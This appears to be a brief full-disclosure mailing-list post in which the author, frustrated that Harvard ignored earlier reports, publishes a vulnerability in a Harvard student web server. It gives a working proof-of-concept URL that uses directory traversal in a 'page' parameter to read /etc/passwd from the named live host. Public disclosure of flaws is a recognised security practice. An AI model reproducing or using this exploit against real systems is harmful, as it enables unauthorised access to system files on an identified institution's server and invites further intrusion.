Hey,

I've tried reporting issues to Harvard University tons of times in the past
but they rarely respond and even more rarely commend researchers for finding
vulnerabilities so I decided that full-disclosure was the way to get Harvard
off of their crimson asses and patch this vulnerability.

PoC link:
http://www.hcs.harvard.edu/~chtnasp/index.php?page=../../../../../../../../../../../../../../../../../../../../../etc/passwd

Enjoy,

Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground